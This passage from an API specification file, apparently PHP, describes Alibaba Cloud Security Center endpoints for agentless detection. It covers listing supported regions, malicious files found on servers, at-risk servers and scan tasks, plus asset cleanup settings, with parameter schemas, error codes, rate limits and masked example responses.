], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Retrieve regions supported by agentless detection', 'summary' => 'Retrieves the regions supported by agentless detection.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessRegion'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAgentlessRegion', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92****\\",\\n \\"RegionList\\": [\\n \\"cn-shanghai\\"\\n ],\\n \\"VendorRegionList\\": [\\n {\\n \\"Vendor\\": 0,\\n \\"RegionId\\": \\"cn-shanghai\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListAgentlessRelateMalicious' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '164463', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'string', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '80****', 'title' => ''], ], [ 'name' => 'Scenario', 'in' => 'query', 'schema' => ['description' => 'The scenario for batch processing. Valid values:'."\n" .'- same_file_md5: same file MD5.'."\n" .'- default (default value): same alerting type.', 'type' => 'string', 'required' => false, 'example' => 'default', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => 'FCA270CC-24C8-5DA1-9184-20F2605C****', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information for the paging query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '197', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'List' => [ 'description' => 'The list of servers with associated risks.', 'type' => 'array', 'items' => [ 'description' => 'The list of servers with associated risks.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '8012', 'title' => ''], 'FirstScanTimestamp' => ['description' => 'The timestamp of the first scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '168257753****', 'title' => ''], 'LatestScanTimestamp' => ['description' => 'The timestamp of the latest scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '168257753****', 'title' => ''], 'Level' => ['description' => 'The severity level. Valid values:'."\n" ."\n" .'- serious: urgent'."\n" .'- suspicious: suspicious'."\n" .'- remind: reminder.', 'type' => 'string', 'example' => 'serious', 'title' => ''], 'MaliciousMd5' => ['description' => 'The MD5 hash of the malicious file.', 'type' => 'string', 'example' => '1f2e13a7c51ee89316ae50066515****', 'title' => ''], 'FilePath' => ['description' => 'The file path.', 'type' => 'string', 'example' => '/root/logs/arms/tracelogs/log****', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset instance.', 'type' => 'string', 'example' => 'sql-test-0****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'TargetId' => ['description' => 'The ID of the task target.', 'type' => 'string', 'example' => 'm-****', 'title' => ''], 'TargetName' => ['description' => 'The name of the task target.', 'type' => 'string', 'example' => 'image_***', 'title' => ''], 'TargetType' => ['description' => 'The object type. Valid values:'."\n" ."\n" .'- **1**: snapshot'."\n" .'- **2**: image.', 'type' => 'string', 'example' => '2', 'title' => ''], 'DownloadUrl' => ['description' => 'The download URL of the malicious sample.', 'type' => 'string', 'example' => 'https://upgrade-rule-pkg.oss-cn-beijing.aliyuncs.com/totalpackage/***', 'title' => ''], 'HighLight' => ['description' => 'The highlighted text, in JSON string format.', 'type' => 'string', 'example' => '{\\"highlight\\":{\\"ruleVersion\\":\\"20230223\\",\\"ruleId\\":600139,\\"events\\":[[207,284]]}}', 'title' => ''], 'Details' => [ 'description' => 'The alert event details.', 'type' => 'array', 'items' => [ 'description' => 'The alert event details.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the alert event detail item.', 'type' => 'string', 'example' => 'MD5', 'title' => ''], 'Type' => ['description' => 'The type of the alert event detail item.', 'type' => 'string', 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'The value of the alert event detail item.', 'type' => 'string', 'example' => '1f2e13a7c51ee89316ae50066515****', 'title' => ''], 'NameKey' => ['description' => 'The name key of the alert event detail item.', 'type' => 'string', 'example' => '${suspicious.mp.db.maliciousfilemd5}', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'MaliciousName' => ['description' => 'The name of the malicious file.', 'type' => 'string', 'example' => 'WebShell', 'title' => ''], 'Partition' => ['description' => 'The disk partition.', 'type' => 'string', 'example' => '/dev/xvda1', 'title' => ''], 'OperateResult' => ['description' => 'The alert handling result.', 'type' => 'string', 'example' => 'addWhitelist.USER.Success', 'title' => ''], 'OperateTimestamp' => ['description' => 'The timestamp when the alert was handled. Unit: milliseconds.', 'type' => 'string', 'example' => '168257753****', 'title' => ''], 'MaliciousType' => ['description' => 'The virus type.', 'type' => 'string', 'example' => 'WebShell', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve risks associated with agentless detection events', 'summary' => 'Retrieves risks associated with agentless detection events.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessRelateMalicious'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAgentlessRelateMalicious', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FCA270CC-24C8-5DA1-9184-20F2605C****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 197,\\n \\"Count\\": 2\\n },\\n \\"List\\": [\\n {\\n \\"Id\\": 8012,\\n \\"FirstScanTimestamp\\": 0,\\n \\"LatestScanTimestamp\\": 0,\\n \\"Level\\": \\"serious\\",\\n \\"MaliciousMd5\\": \\"1f2e13a7c51ee89316ae50066515****\\",\\n \\"FilePath\\": \\"/root/logs/arms/tracelogs/log****\\",\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"InstanceName\\": \\"sql-test-0****\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"TargetId\\": \\"m-****\\",\\n \\"TargetName\\": \\"image_***\\",\\n \\"TargetType\\": \\"2\\",\\n \\"DownloadUrl\\": \\"https://upgrade-rule-pkg.oss-cn-beijing.aliyuncs.com/totalpackage/***\\",\\n \\"HighLight\\": \\"{\\\\\\\\\\\\\\"highlight\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"ruleVersion\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"20230223\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ruleId\\\\\\\\\\\\\\":600139,\\\\\\\\\\\\\\"events\\\\\\\\\\\\\\":[[207,284]]}}\\",\\n \\"Details\\": [\\n {\\n \\"Name\\": \\"MD5\\",\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"1f2e13a7c51ee89316ae50066515****\\",\\n \\"NameKey\\": \\"${suspicious.mp.db.maliciousfilemd5}\\"\\n }\\n ],\\n \\"MaliciousName\\": \\"WebShell\\",\\n \\"Partition\\": \\"/dev/xvda1\\",\\n \\"OperateResult\\": \\"addWhitelist.USER.Success\\",\\n \\"OperateTimestamp\\": \\"168257753****\\",\\n \\"MaliciousType\\": \\"WebShell\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListAgentlessRiskUuid' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '157335', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'default' => '1', 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return per page when using paging.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'default' => '20', 'example' => '10', 'title' => ''], ], [ 'name' => 'MachineName', 'in' => 'query', 'schema' => ['description' => 'The instance name.', 'type' => 'string', 'required' => false, 'example' => 'oracle-win-001****', 'title' => ''], ], [ 'name' => 'InternetIp', 'in' => 'query', 'schema' => ['description' => 'The public IP address of the asset to query.', 'type' => 'string', 'required' => false, 'example' => '1.1.XX.XX', 'title' => ''], ], [ 'name' => 'IntranetIp', 'in' => 'query', 'schema' => ['description' => 'The private IP address of the asset to query.', 'type' => 'string', 'required' => false, 'example' => '172.26.XX.XX', 'title' => ''], ], [ 'name' => 'TargetName', 'in' => 'query', 'schema' => ['description' => 'The name of the detection target.', 'type' => 'string', 'required' => false, 'example' => 'source-test-obj-0****'."\n", 'title' => ''], ], [ 'name' => 'Risk', 'in' => 'query', 'schema' => ['description' => 'Specifies whether risks exist. Valid values:'."\n" ."\n" .'- **true**: Risks exist.'."\n" .'- **false**: Risks do not exist.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The object type of the detection target. Valid values:'."\n" ."\n" .'- **1**: host snapshot'."\n" .'- **2**: host image'."\n" .'- **3**: user snapshot'."\n" .'- **4**: user custom image', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset instance.', 'type' => 'string', 'required' => false, 'example' => 's-bp1g6wxdwps7s9dz****', 'title' => ''], ], [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'The name of the asset instance.', 'type' => 'string', 'required' => false, 'example' => 'ca_cpm_****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '05AE6B16-741A-5A75-9BF0-BC747DD9****', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], ], 'title' => '', 'example' => '', ], 'List' => [ 'description' => 'The list of servers.', 'type' => 'array', 'items' => [ 'description' => 'The list of servers.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the asset.', 'type' => 'string', 'example' => 'sql-test-0****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'VulCount' => ['description' => 'The number of detected vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'MaliciousCount' => ['description' => 'The number of malicious samples.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'BaselineCount' => ['description' => 'The number of baseline risk items.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TargetId' => ['description' => 'The ID of the scan target.', 'type' => 'string', 'example' => '30****', 'title' => ''], 'TargetName' => ['description' => 'The name of the scan target.', 'type' => 'string', 'example' => 'test****', 'title' => ''], 'ScanTime' => ['description' => 'The timestamp of the scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '168257753****', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the asset instance.', 'type' => 'string', 'example' => 's-bp1g6wxdwps7s9dz****'."\n", 'title' => ''], 'ReportUrlHtml' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve agentless detection vulnerable server list', 'summary' => 'Retrieves the list of vulnerable servers detected by agentless detection.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessRiskUuid'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"05AE6B16-741A-5A75-9BF0-BC747DD9****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69\\n },\\n \\"List\\": [\\n {\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"InstanceName\\": \\"sql-test-0****\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"VulCount\\": 1,\\n \\"MaliciousCount\\": 1,\\n \\"BaselineCount\\": 1,\\n \\"TargetId\\": \\"30****\\",\\n \\"TargetName\\": \\"test****\\",\\n \\"ScanTime\\": 0,\\n \\"InstanceId\\": \\"s-bp1g6wxdwps7s9dz****\\\\n\\",\\n \\"ReportUrlHtml\\": \\"\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListAgentlessTask' => [ 'summary' => 'Retrieves the list of agentless detection tasks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '155393', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. Paging starts from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Paging is performed based on this value.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The scan object type. Valid values:'."\n" ."\n" .'- **1**: snapshot '."\n" .'- **2**: image.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'RootTaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the root task.', 'type' => 'string', 'required' => false, 'example' => '12c27343861610c5db3f7a2573b4****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The detection status. Valid values:'."\n" ."\n" .'- **1**: Detecting.'."\n" .'- **2**: Completed.'."\n" .'- **3**: Failed.'."\n" .'- **4**: Timed out.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the start time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1651290987000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the end time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1635575219000', 'title' => ''], ], [ 'name' => 'RootTask', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to query the root task list. Valid values:'."\n" ."\n" .'- **true**: Root tasks.'."\n" .'- **false**: Subtasks.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the root task. Specify this parameter to query the subtask list of a root task.', 'type' => 'string', 'required' => false, 'example' => 'd7b2acf8d362742123e4a84e1bf8****', 'title' => ''], ], [ 'name' => 'MachineName', 'in' => 'query', 'schema' => ['description' => 'The name of the instance.', 'type' => 'string', 'required' => false, 'example' => 'oracle-win-001****', 'title' => ''], ], [ 'name' => 'InternetIp', 'in' => 'query', 'schema' => ['description' => 'The public IP address of the asset to query.', 'type' => 'string', 'required' => false, 'example' => '1.1.XX.XX', 'title' => ''], ], [ 'name' => 'IntranetIp', 'in' => 'query', 'schema' => ['description' => 'The private IP address of the asset to query.', 'type' => 'string', 'required' => false, 'example' => '172.26.XX.XX', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.', 'type' => 'string', 'required' => false, 'example' => 'e4af3620-6895-4e2f-a641-a9d8fb53****', 'title' => ''], ], [ 'name' => 'TargetName', 'in' => 'query', 'schema' => ['description' => 'The name of the detection target.', 'type' => 'string', 'required' => false, 'example' => 'source-test-obj-0****'."\n", 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type. Valid values: '."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '1A975D03-5F49-5354-B2CB-3918D5DA****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query. Paging starts from page 1.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query. Paging is performed based on this value.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '55', 'title' => ''], ], 'title' => '', 'example' => '', ], 'List' => [ 'description' => 'The task list.', 'type' => 'array', 'items' => [ 'description' => 'The task list.', 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The task ID.', 'type' => 'string', 'example' => '1538****', 'title' => ''], 'TaskName' => ['description' => 'The name of the detection task.', 'type' => 'string', 'example' => 'AGENTLESS_SCAN', 'title' => ''], 'TargetType' => ['description' => 'The object type. Valid values:'."\n" ."\n" .'- **1**: snapshot'."\n" .'- **2**: image.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Status' => ['description' => 'The detection status. Valid values:'."\n" ."\n" .'- **1**: Detecting.'."\n" .'- **2**: Completed.'."\n" .'- **3**: Failed.'."\n" .'- **4**: Timed out.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Progress' => ['description' => 'The task progress.', 'type' => 'integer', 'format' => 'int32', 'example' => '60', 'title' => ''], 'StartTime' => ['description' => 'The start timestamp of the task, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1672741657897', 'title' => ''], 'EndTime' => ['description' => 'The end timestamp of the task, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1678895999999', 'title' => ''], 'Result' => ['description' => 'The detection result.', 'type' => 'string', 'example' => 'True', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset instance.', 'type' => 'string', 'example' => 'sql-test-0****', 'title' => ''], 'TargetName' => ['description' => 'The name of the scan target.', 'type' => 'string', 'example' => 'hkdevt****', 'title' => ''], 'ProgressByProject' => ['description' => 'The execution progress of the check item.', 'type' => 'string', 'example' => '"{\\"scaVul\\":100,\\"binary\\":100,\\"baseline\\":100,\\"vul\\":100,\\"webshell\\":100,\\"script\\":100,\\"sensitiveInfo\\":100}"', 'title' => ''], 'ReportStatus' => ['description' => 'The report status. Valid values:'."\n" .' - **PREPARED**: Preparing.'."\n" .' - **RUNNING**: Running.'."\n" .' - **SUCCESS**: Succeeded.'."\n" .' - **TIMEOUT**: Timed out.'."\n" .' - **FAILED**: Failed.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'ReportDownloadUrl' => ['description' => 'The download URL of the report.', 'type' => 'string', 'example' => 'http://newsas-oss-bucket.oss-cn-hangzhou.aliyuncs.com/agent_less_single_report****', 'title' => ''], 'MeasureSpace' => ['description' => 'The amount of detected data, in MB.', 'type' => 'integer', 'format' => 'int64', 'example' => '154.11', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'example' => 's-wz95vuqky0ada4******', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve agentless detection task list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAgentlessTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1A975D03-5F49-5354-B2CB-3918D5DA****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 55\\n },\\n \\"List\\": [\\n {\\n \\"TaskId\\": \\"1538****\\",\\n \\"TaskName\\": \\"AGENTLESS_SCAN\\",\\n \\"TargetType\\": 2,\\n \\"Status\\": 1,\\n \\"Progress\\": 60,\\n \\"StartTime\\": 1672741657897,\\n \\"EndTime\\": 1678895999999,\\n \\"Result\\": \\"True\\",\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"InstanceName\\": \\"sql-test-0****\\",\\n \\"TargetName\\": \\"hkdevt****\\",\\n \\"ProgressByProject\\": \\"\\\\\\"{\\\\\\\\\\\\\\"scaVul\\\\\\\\\\\\\\":100,\\\\\\\\\\\\\\"binary\\\\\\\\\\\\\\":100,\\\\\\\\\\\\\\"baseline\\\\\\\\\\\\\\":100,\\\\\\\\\\\\\\"vul\\\\\\\\\\\\\\":100,\\\\\\\\\\\\\\"webshell\\\\\\\\\\\\\\":100,\\\\\\\\\\\\\\"script\\\\\\\\\\\\\\":100,\\\\\\\\\\\\\\"sensitiveInfo\\\\\\\\\\\\\\":100}\\\\\\"\\",\\n \\"ReportStatus\\": \\"SUCCESS\\",\\n \\"ReportDownloadUrl\\": \\"http://newsas-oss-bucket.oss-cn-hangzhou.aliyuncs.com/agent_less_single_report****\\",\\n \\"MeasureSpace\\": 154.11,\\n \\"InstanceId\\": \\"s-wz95vuqky0ada4******\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListAssetCleanConfig' => [ 'summary' => 'Queries the configurations for cleaning offline hosts whose provider cannot be identified.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'list'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '20456DD5-5CBF-5015-9173-12CA4246B***', 'title' => ''], 'Data' => [ 'description' => 'The asset cleanup configurations.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of hosts that are cleaned.'."\n" ."\n" .'* The value is set to **1**, which indicates hosts whose provider cannot be identified.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CleanDays' => ['description' => 'The number of days before hosts whose provider cannot be identified are automatically cleaned after they enter the offline state. Valid value: an integer that ranges from 1 to 30.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'Status' => ['description' => 'Indicates whether the configuration takes effect. Valid values:'."\n" ."\n" .'* **0**: The configuration does not take effect.'."\n" .'* **1**: The configuration takes effect.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of cleanup configurations.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246B***\\",\\n \\"Data\\": [\\n {\\n \\"Type\\": 1,\\n \\"CleanDays\\": 7,\\n \\"Status\\": 1\\n }\\n ],\\n \\"Count\\": 1\\n}","type":"json"}]', 'title' => 'ListAssetCleanConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetCleanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAssetCleanConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListAssetInfoPublish' => [ 'summary' => 'Queries the custom upgrade information about 